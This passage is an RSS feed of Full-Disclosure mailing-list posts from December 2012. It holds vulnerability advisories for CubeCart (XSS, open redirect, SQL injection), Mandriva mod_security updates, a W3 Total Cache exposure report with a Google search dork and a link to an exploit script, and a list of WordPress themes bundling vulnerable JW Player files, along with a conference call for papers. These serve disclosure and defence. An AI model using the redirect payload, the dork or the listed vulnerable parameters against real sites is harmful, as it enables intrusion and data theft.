/admin.php (page parameter)<br />
/admin.php (prod_master_id parameter)<br />
/admin.php (searchStr parameter)<br />
/admin.php (thumbName[] parameter)<br />
/admin.php (User-Agent HTTP header)<br />
/admin.php (yStart parameter)<br />
/index.php (Referer HTTP header)<br />
<br />
<br />
6. SOLUTION<br />
<br />
The CubeCart 4.x version family is no longer maintained by the vendor.<br />
Upgrade to the currently supported latest CubeCart version - 5.x.<br />
<br />
<br />
7. VENDOR<br />
<br />
CubeCart Development Team<br />
[<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle<br />
2012-12-24: Vulnerability disclosed<br />
<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_xss"  rel="nofollow">yehg.net</a>]<br />
CubeCart Home Page: [<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
CubeCart Bug-Fix Announcement:<br />
[<a href="http://forums.cubecart.com/topic/45456-cubecart-447-released/"  rel="nofollow">forums.cubecart.com</a>]<br />
CubeCart4 End-of-Life Announcement:<br />
[<a href="http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/"  rel="nofollow">forums.cubecart.com</a>]<br />
<br />
#yehg [2012-12-24]<br />
<br />
---------------------------------<br />
Best regards,<br />
YGN Ethical Hacker Group<br />
Yangon, Myanmar<br />
[<a href="http://yehg.net"  rel="nofollow">yehg.net</a>]<br />
Our Lab | [<a href="http://yehg.net/lab"  rel="nofollow">yehg.net</a>]<br />
Our Directory | [<a href="http://yehg.net/hwd"  rel="nofollow">yehg.net</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Mon, 24 Dec 2012 20:32:12 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1698105,1698105#msg-1698105</guid>
            <title>[Full-disclosure] CubeCart 5.0.7 and lower | Open URL Redirection Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1698105,1698105#msg-1698105</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
CubeCart 5.0.7 and lower versions are vulnerable to Open URL Redirection.<br />
<br />
<br />
2. BACKGROUND<br />
<br />
CubeCart is an &quot;out of the box&quot; ecommerce shopping cart software<br />
solution which has been written to run on servers that have PHP &amp;<br />
MySQL support. With CubeCart you can quickly setup a powerful online<br />
store which can be used to sell digital or tangible products to new<br />
and existing customers all over the world.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
CubeCart 5.0.7 and lower versions contain a flaw that allows a remote<br />
cross site redirection attack. This flaw exists because the<br />
application does not properly sanitise the &quot;redir&quot; parameter.  This<br />
allows an attacker to create a specially crafted URL, that if clicked,<br />
would redirect a victim from the intended legitimate web site to an<br />
arbitrary web site of the attacker's choice.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
5.0.7 and lower<br />
<br />
<br />
5. Affected URL and Parameter<br />
<br />
/admin.php (redir parameter)<br />
/admin.php?redir=//yehg.net/%3f (Redirect after login)<br />
<br />
<br />
6. SOLUTION<br />
<br />
Upgrade to the latest CubeCart version - 5.x.<br />
<br />
<br />
7. VENDOR<br />
<br />
CubeCart Development Team<br />
[<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-03-24: Vulnerability reported<br />
2012-12-24: Vulnerability disclosed<br />
<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_open_url_redirection"  rel="nofollow">yehg.net</a>]<br />
CubeCart Home Page: [<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
	<br />
#yehg [2012-12-24]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Mon, 24 Dec 2012 20:25:41 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1697471,1697471#msg-1697471</guid>
            <title>[Full-disclosure] Wordpress Remote Exploit - W3 Total Cache (3 replies)</title>
            <link>http://choon.net/forum/read.php?23,1697471,1697471#msg-1697471</link>
            <description><![CDATA[ Hi all,<br />
<br />
&gt;From the developers' description [1], W3 Total Cache is:<br />
<br />
&gt; The most complete WordPress performance framework.<br />
&gt; Recommended by web hosts like: MediaTemple, Host Gator, Page.ly and WP Engine and countless more.<br />
&gt; Trusted by countless sites like: stevesouders.com, mattcutts.com, mashable.com, smashingmagazine.com, makeuseof.com, yoast.com, kiss925.com, pearsonified.com, lockergnome.com, johnchow.com, ilovetypography.com, webdesignerdepot.com, css-tricks.com and tens of thousands of others.<br />
&gt; W3 Total Cache improves the user experience of your site by improving your server performance, caching every aspect of your site, reducing the download times and providing transparent content delivery network (CDN) integration.<br />
&gt; Downloads: 1,388,876<br />
&gt; Ratings: 4.6 out of 5 stars<br />
<br />
Unfortunately, it's frequently incorrectly deployed. When I set it up<br />
by going to the Wordpress panel and choosing &quot;add plugin&quot; and<br />
selecting the plugin from the Wordpress Plugin Catalog (or whatever),<br />
it left two avenues of attack open:<br />
<br />
1) Directory listings were enabled on the cache directory, which means<br />
anyone could easily recursively download all the database cache keys,<br />
and extract ones containing sensitive information, such as password<br />
hashes. A simple google search of<br />
&quot;inurl:wp-content/plugins/w3tc/dbcache&quot; and maybe some other magic<br />
reveals this wasn't just an issue for me. As W3 Total Cache already<br />
futzes with the .htaccess file, I see no reason for it not to add<br />
&quot;Options -Indexes&quot; to it upon installation. I haven't read any W3<br />
documentation, so it's possible this is a known and documented<br />
misconfiguration, but maybe not.<br />
<br />
2) Even with directory listings off, cache files are by default<br />
publicly downloadable, and the key values / file names of the database<br />
cache items are easily predictable. Again, it seems odd that &quot;deny<br />
from all&quot; isn't added to the .htaccess file. Maybe it's documented<br />
somewhere that you should secure your directories, or maybe it isn't;<br />
I'm not sure.<br />
<br />
If I had to categorize these holes, I'd say they're due to<br />
&quot;misconfiguration&quot;, but I figure it's relevant to write in to<br />
full-disclosure &amp; webappsec because I'm usually not horrible with<br />
configuring things and I made these mistakes several times without<br />
realizing. I'm copying the author on this email, as he may want to<br />
include a warning message where nieve folks like myself can see it, or<br />
document these somewhere if they're not already, or at least apply the<br />
two .htaccess tweaks mentioned above.<br />
<br />
Anyway I put together a short and simple shell script that works<br />
pretty decently against my own various wordpress websites, and<br />
exploits the configuration error in point (2) above. Exploiting point<br />
(1) can be done with wget &amp; grep and is even more dull than the below<br />
exploit.<br />
<br />
****************<br />
W3 Total Fail<br />
<br />
Exploit for point (2):<br />
[<a href="http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh"  rel="nofollow">git.zx2c4.com</a>]  (Read the<br />
entire usage message.)<br />
<br />
Screencast for point (2):<br />
[<a href="http://git.zx2c4.com/w3-total-fail/plain/screencast.ogv"  rel="nofollow">git.zx2c4.com</a>] or<br />
[<a href="https://www.youtube.com/watch?v=sqZ_zYLFDSo"  rel="nofollow">www.youtube.com</a>]<br />
<br />
****************<br />
<br />
<br />
Merry Christmas.<br />
<br />
<br />
- Jason<br />
  zx2c4<br />
<br />
<br />
<br />
[1] [<a href="http://wordpress.org/extend/plugins/w3-total-cache/"  rel="nofollow">wordpress.org</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>Jason A. Donenfeld</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Tue, 25 Dec 2012 00:48:19 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1696318,1696318#msg-1696318</guid>
            <title>[Full-disclosure] [ MDVSA-2012:183 ] apache-mod_security (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1696318,1696318#msg-1696318</link>
            <description><![CDATA[ -----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
 _______________________________________________________________________<br />
<br />
 Mandriva Linux Security Advisory                         MDVSA-2012:183<br />
 [<a href="http://www.mandriva.com/security/"  rel="nofollow">www.mandriva.com</a>]<br />
 _______________________________________________________________________<br />
<br />
 Package : apache-mod_security<br />
 Date    : December 23, 2012<br />
 Affected: Enterprise Server 5.0<br />
 _______________________________________________________________________<br />
<br />
 Problem Description:<br />
<br />
 A vulnerability has been discovered and corrected in<br />
 apache-mod_security:<br />
 <br />
 ModSecurity &amp;lt;= 2.6.8 is vulnerable to multipart/invalid part<br />
 ruleset bypass, this was fixed in 2.7.0 (released on2012-10-16)<br />
 (CVE-2012-4528).<br />
 <br />
 The updated packages have been patched to correct this issue.<br />
 _______________________________________________________________________<br />
<br />
 References:<br />
<br />
 [<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4528"  rel="nofollow">cve.mitre.org</a>]<br />
 _______________________________________________________________________<br />
<br />
 Updated Packages:<br />
<br />
 Mandriva Enterprise Server 5:<br />
 18413b1e0520660d62de9e65fb2481ce  mes5/i586/apache-mod_security-2.5.12-0.3mdvmes5.2.i586.rpm<br />
 6bd19e22c13a4b5aca610c6a7049792a  mes5/i586/mlogc-2.5.12-0.3mdvmes5.2.i586.rpm <br />
 70689b90d15d7fba2ae35c8a4c40a960  mes5/SRPMS/apache-mod_security-2.5.12-0.3mdvmes5.2.src.rpm<br />
<br />
 Mandriva Enterprise Server 5/X86_64:<br />
 bea5768d5f9a05b8d53426708ac7362d  mes5/x86_64/apache-mod_security-2.5.12-0.3mdvmes5.2.x86_64.rpm<br />
 eea9adbbbfed5e5514a0370d2ff5b4c7  mes5/x86_64/mlogc-2.5.12-0.3mdvmes5.2.x86_64.rpm <br />
 70689b90d15d7fba2ae35c8a4c40a960  mes5/SRPMS/apache-mod_security-2.5.12-0.3mdvmes5.2.src.rpm<br />
 _______________________________________________________________________<br />
<br />
 To upgrade automatically use MandrivaUpdate or urpmi.  The verification<br />
 of md5 checksums and GPG signatures is performed automatically for you.<br />
<br />
 All packages are signed by Mandriva for security.  You can obtain the<br />
 GPG public key of the Mandriva Security Team by executing:<br />
<br />
  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98<br />
<br />
 You can view other update advisories for Mandriva Linux at:<br />
<br />
  [<a href="http://www.mandriva.com/security/advisories"  rel="nofollow">www.mandriva.com</a>]<br />
<br />
 If you want to report vulnerabilities, please contact<br />
<br />
  security_(at)_mandriva.com<br />
 _______________________________________________________________________<br />
<br />
 Type Bits/KeyID     Date       User ID<br />
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team<br />
  &lt;security*mandriva.com&gt;<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: GnuPG v1.4.11 (GNU/Linux)<br />
<br />
iD8DBQFQ1076mqjQ0CJFipgRAmksAJ0S6kPArq56K3HgMfddaQaG7VXjIgCfTkHS<br />
o+UKMo90pYCRMwVLHAzLh6Y=<br />
=d+2j<br />
-----END PGP SIGNATURE-----<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Mon, 24 Dec 2012 05:45:18 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1696283,1696283#msg-1696283</guid>
            <title>[Full-disclosure] [ MDVSA-2012:182 ] apache-mod_security (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1696283,1696283#msg-1696283</link>
            <description><![CDATA[ -----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
 _______________________________________________________________________<br />
<br />
 Mandriva Linux Security Advisory                         MDVSA-2012:182<br />
 [<a href="http://www.mandriva.com/security/"  rel="nofollow">www.mandriva.com</a>]<br />
 _______________________________________________________________________<br />
<br />
 Package : apache-mod_security<br />
 Date    : December 23, 2012<br />
 Affected: 2011.<br />
 _______________________________________________________________________<br />
<br />
 Problem Description:<br />
<br />
 Multiple vulnerabilities has been discovered and corrected in<br />
 apache-mod_security:<br />
 <br />
 ModSecurity before 2.6.6, when used with PHP, does not properly handle<br />
 single quotes not at the beginning of a request parameter value in<br />
 the Content-Disposition field of a request with a multipart/form-data<br />
 Content-Type header, which allows remote attackers to bypass filtering<br />
 rules and perform other attacks such as cross-site scripting (XSS)<br />
 attacks. NOTE: this vulnerability exists because of an incomplete<br />
 fix for CVE-2009-5031 (CVE-2012-2751).<br />
 <br />
 ModSecurity &amp;lt;= 2.6.8 is vulnerable to multipart/invalid part<br />
 ruleset bypass, this was fixed in 2.7.0 (released on2012-10-16)<br />
 (CVE-2012-4528).<br />
 <br />
 The updated packages have been patched to correct these issues.<br />
 _______________________________________________________________________<br />
<br />
 References:<br />
<br />
 [<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2751"  rel="nofollow">cve.mitre.org</a>]<br />
 [<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4528"  rel="nofollow">cve.mitre.org</a>]<br />
 _______________________________________________________________________<br />
<br />
 Updated Packages:<br />
<br />
 Mandriva Linux 2011:<br />
 97ce3bb44e48983170bd6f112a578c3c  2011/i586/apache-mod_security-2.6.1-1.1-mdv2011.0.i586.rpm<br />
 044aa147cd2c9b4989f47a74d04f3a62  2011/i586/mlogc-2.6.1-1.1-mdv2011.0.i586.rpm <br />
 4657a73f501344810c72d76c58532190  2011/SRPMS/apache-mod_security-2.6.1-1.1.src.rpm<br />
<br />
 Mandriva Linux 2011/X86_64:<br />
 d5e55155f32a9118977a96ea86efe1cf  2011/x86_64/apache-mod_security-2.6.1-1.1-mdv2011.0.x86_64.rpm<br />
 61d99efd771a68bb801b602294ce6efb  2011/x86_64/mlogc-2.6.1-1.1-mdv2011.0.x86_64.rpm <br />
 4657a73f501344810c72d76c58532190  2011/SRPMS/apache-mod_security-2.6.1-1.1.src.rpm<br />
 _______________________________________________________________________<br />
<br />
 To upgrade automatically use MandrivaUpdate or urpmi.  The verification<br />
 of md5 checksums and GPG signatures is performed automatically for you.<br />
<br />
 All packages are signed by Mandriva for security.  You can obtain the<br />
 GPG public key of the Mandriva Security Team by executing:<br />
<br />
  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98<br />
<br />
 You can view other update advisories for Mandriva Linux at:<br />
<br />
  [<a href="http://www.mandriva.com/security/advisories"  rel="nofollow">www.mandriva.com</a>]<br />
<br />
 If you want to report vulnerabilities, please contact<br />
<br />
  security_(at)_mandriva.com<br />
 _______________________________________________________________________<br />
<br />
 Type Bits/KeyID     Date       User ID<br />
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team<br />
  &lt;security*mandriva.com&gt;<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: GnuPG v1.4.11 (GNU/Linux)<br />
<br />
iD8DBQFQ10wDmqjQ0CJFipgRAps5AJ4qK+9Wd2lVri03D+VVzWRgksdTkgCeOOeZ<br />
jnUCJwVJ+dnG0N7muIDsCFM=<br />
=u8HT<br />
-----END PGP SIGNATURE-----<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Mon, 24 Dec 2012 05:34:02 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1694960,1694960#msg-1694960</guid>
            <title>[Full-disclosure] dyne_bolic hacked? (2 replies)</title>
            <link>http://choon.net/forum/read.php?23,1694960,1694960#msg-1694960</link>
            <description><![CDATA[ anyone seen this yet? its been floating around irc tonight. supposed to be<br />
Dyne.org (the people who make the Dyne_Bolic OS) hacked. good thing i use<br />
BSD!<br />
<br />
Title: EGO[0] zine<br />
Link: [<a href="http://pastebin.com/NnJ19iPz"  rel="nofollow">pastebin.com</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Tue, 25 Dec 2012 21:19:46 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1694959,1694959#msg-1694959</guid>
            <title>[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Multiple SQL Injection Vulnerabilities (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1694959,1694959#msg-1694959</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
The CubeCart 3.0.20 and lower versions are vulnerable to SQL Injection.<br />
<br />
<br />
2. BACKGROUND<br />
<br />
CubeCart is an &quot;out of the box&quot; ecommerce shopping cart software<br />
solution which has been written to run on servers that have PHP &amp;<br />
MySQL support. With CubeCart you can quickly setup a powerful online<br />
store which can be used to sell digital or tangible products to new<br />
and existing customers all over the world.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
Multiple parameters are not properly sanitized, which allows attacker<br />
to conduct  SQL Injection attack. This could an attacker to inject or<br />
manipulate SQL queries in the back-end database, allowing for the<br />
manipulation or disclosure of arbitrary data.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
3.0.20 and lower (aka 3.0.x family)<br />
<br />
<br />
5. Affected URLs and Parameters<br />
<br />
//cube/admin/products/extraCats.php (add parameter)<br />
/cube/admin/products/index.php (cat_id parameter)<br />
/cube/admin/products/index.php (category parameter)<br />
/cube/admin/products/index.php (orderCol parameter)<br />
/cube/admin/products/index.php (orderDir parameter)<br />
/cube/admin/products/options.php (masterProduct parameter)<br />
/cube/admin/settings/currency.php (active parameter)<br />
<br />
<br />
6. SOLUTION<br />
<br />
The CubeCart 3.0.x version family is no longer maintained by the vendor.<br />
Upgrade to the currently supported CubeCart version - 5.x.<br />
<br />
<br />
7. VENDOR<br />
<br />
CubeCart Development Team<br />
http:/cart.com/<br />
<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle<br />
2012-12-22: Vulnerability disclosed<br />
<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_sqli"  rel="nofollow">yehg.net</a>]<br />
CubeCart Home Page: [<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
<br />
	<br />
#yehg [2012-12-22]<br />
<br />
---------------------------------<br />
Best regards,<br />
YGN Ethical Hacker Group<br />
Yangon, Myanmar<br />
[<a href="http://yehg.net"  rel="nofollow">yehg.net</a>]<br />
Our Lab | [<a href="http://yehg.net/lab"  rel="nofollow">yehg.net</a>]<br />
Our Directory | [<a href="http://yehg.net/hwd"  rel="nofollow">yehg.net</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Sun, 23 Dec 2012 19:51:08 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1693691,1693691#msg-1693691</guid>
            <title>[Full-disclosure] Recruiting Troopers - Call for Papers, March 13-14 2013 (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1693691,1693691#msg-1693691</link>
            <description><![CDATA[ Once more, it will be Troopers time.<br />
<br />
<br />
This year was an extraordinary event. Everybody involved had so much fun (in the end, the term &quot;best security con. ever&quot; got a bit overstressed ;-) and we had so many great talks... it seems quite difficult to do even better next year. Still, we'll try.<br />
You can be part of it. Again, Troopers - www.troopers.de - will be held in the beautiful city of Heidelberg/Germany (on 03/13 and 03/14 2013) and will feature two tracks, one on attack techniques and security research, the other focused on the defense side and management aspects of the infosec world. You might look at [<a href="http://www.troopers.de/wp-content/uploads/2011/04/TR11_Enno_Rey_Keynote_Day01.pdf"  rel="nofollow">www.troopers.de</a>] to get an idea of the spirit of the event.<br />
<br />
<br />
This call for papers addresses security researchers interested in sharing their work with other researchers and a high level audience (composed of about 60% people from industry, 20% from academia and another 20% from [research] community). We would like to invite everyone with special knowledge in breaking security in whatever area or practical experience in securing complex information systems to present their skills, tools or experience.<br />
<br />
<br />
Speaker Privileges<br />
==================<br />
<br />
We will cover the flight costs (limited to EUR 750 for speakers from Europe and US$ 1800 for speakers from other continents) and three nights of accomodation, plus &quot;some evening fun and other amenities&quot;. To get an idea of our speaker treatment see [<a href="http://www.elladodelmal.com/2010/03/como-una-rockn-roll-star.html"  rel="nofollow">www.elladodelmal.com</a>] ;-)<br />
<br />
<br />
&quot;Fresh Headz&quot;<br />
=============<br />
<br />
Given an appropriate subject and technical level we're happy to welcome &quot;fresh speakers&quot; (not seen in various places before) and we're happy to help you with setting up your talk (or getting over your pre-talk excitement).<br />
<br />
<br />
<br />
Submissions<br />
===========<br />
<br />
We are mainly interested in talks on<br />
<br />
Security in a Mobile World<br />
Virtualization &amp; Cloud Stuff<br />
Embedded Devices<br />
Industrial Networking<br />
Security in Telco Environments<br />
Secure Coding &amp; Advances in the Software Security Space<br />
Feasible Risk Assessment Approaches<br />
Digital Certificates in 2013<br />
IPv6<br />
<br />
<br />
Obviously heavy vendor-pitching will not be welcomed warmly and we reserve the right to ask for modifications of confirmed talks if we have the impression there's too much of that in a talk. <br />
<br />
<br />
CFP submissions [to <a href="mailto:&#99;&#102;&#112;&#64;&#116;&#114;&#111;&#111;&#112;&#101;&#114;&#115;&#46;&#100;&#101;">&#99;&#102;&#112;&#64;&#116;&#114;&#111;&#111;&#112;&#101;&#114;&#115;&#46;&#100;&#101;</a> or/and simply reply to this mail] must include the following information: <br />
<br />
1) Brief biography including list of publications and papers published previously. <br />
<br />
2) Proposed presentation title &amp; synopsis/description.<br />
<br />
3) Contact Information (full name, alias, handle, e-mail, postal address, phone, country of origin, special meal requirement, smoking habits ;-).<br />
<br />
4) Employment and/or affiliations information. <br />
 <br />
5) Why is your material different or innovative or significant?<br />
<br />
Please note that all speakers will be allocated 55 minutes of presentation time + 5 minutes Q+A. Any speakers that require more time must inform the CFP committee in the course of the submission.<br />
<br />
By agreeing to speak at Troopers 13 you are granting ERNW GmbH the rights to reproduce, distribute, advertise and show your presentation including but not limited to [<a href="http://www.troopers.de"  rel="nofollow">www.troopers.de</a>], printed and/or electronic advertisements, and all other mediums.<br />
<br />
 <br />
<br />
Important Dates<br />
===============<br />
<br />
Deadline for Submission: 15 Jan 2013,<br />
Final Notification: 01 Feb 2013,<br />
Presentation slides due: 01 Mar 2013<br />
The conference: 13-14 Mar 2013.<br />
<br />
<br />
==================<br />
<br />
thanks,<br />
<br />
Enno<br />
<br />
<br />
-- <br />
Enno Rey<br />
<br />
<br />
ERNW GmbH - Carl-Bosch-Str. 4 - 69115 Heidelberg - www.ernw.de<br />
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 174 3082474<br />
PGP FP 055F B3F3 FE9D 71DD C0D5  444E C611 033E 3296 1CC1<br />
<br />
Handelsregister Mannheim: HRB 337135<br />
Geschaeftsfuehrer: Enno Rey<br />
<br />
=======================================================<br />
Blog: www.insinuator.net || Conference: www.troopers.de<br />
=======================================================<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>Enno Rey</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Sun, 23 Dec 2012 08:00:20 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1693675,1693675#msg-1693675</guid>
            <title>[Full-disclosure] Multiple vulnerabilities in multiple themes for WordPress (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1693675,1693675#msg-1693675</link>
            <description><![CDATA[ Hello list!<br />
<br />
Some time ago, when I've found vulnerabilities in plugin BuddyPress for <br />
WordPress (particularly in Affinity BuddyPress theme for it) with Rokbox, <br />
which I disclosed earlier, I also found multiple vulnerable themes for WP <br />
with Rokbox.<br />
<br />
So I want to warn you about multiple vulnerabilities in multiple themes for <br />
WordPress. These are themes developed by Rokbox's developers. And they put <br />
Rokbox (with JW Player, but without TimThumb) into their themes.<br />
<br />
These are Content Spoofing, Cross-Site Scripting, Full path disclosure and <br />
Information Leakage vulnerabilities. I've disclosed vulnerabilities in JW <br />
Player in June and August (including in commercial version JW Player Pro) <br />
and disclosed vulnerabilities in Rokbox in December. These vulnerabilities <br />
are similar to vulnerabilities in Affinity BuddyPress theme. Also I've found <br />
many WP themes by other developers with Rokbox, but I'd write about them <br />
separately, because they have much more holes.<br />
<br />
-------------------------<br />
Affected products:<br />
-------------------------<br />
<br />
Vulnerable are all WordPress themes by RocketTheme (during quick research I <br />
found 16 themes for WP, in addition to above-mentioned theme for BP, but I <br />
supposed all their themes contain Rokbox with JW Player 4.4.198). They <br />
haven't removed this vulnerable version of JW Player from Rokbox and so from <br />
any of their themes (for WP and BP), when I've informed them in August.<br />
<br />
Here are these 16 vulnerable themes, which I found:<br />
<br />
rt_afterburner_wp<br />
rt_refraction_wp<br />
rt_solarsentinel_wp<br />
rt_mixxmag_wp (Mixxmag)<br />
rt_iridium_wp<br />
rt_infuse_wp (infuse)<br />
rt_perihelion_wp<br />
rt_replicant2_wp<br />
rt_affinity_wp<br />
rt_nexus_wp<br />
rt_sentinel<br />
rt_mynxx_wp_vestnikp<br />
rt_mynxx_wp (rt.mynxx.wp)<br />
rt_moxy_wp<br />
rt_terrantribune_wp<br />
rt_meridian_wp<br />
<br />
They will be added to those 94 vulnerable themes for WordPress, in which <br />
I've found vulnerabilities (http://websecurity.com.ua/4915/).<br />
<br />
In Google's index there are now up to 634000 pages with Rokbox at WP sites. <br />
So there are a lot of vulnerable themes and web sites with these themes.<br />
<br />
----------<br />
Details:<br />
----------<br />
<br />
The paths for these themes are the next:<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
[<a href="http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
[<a href="http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
[<a href="http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf"  rel="nofollow">site</a>]<br />
<br />
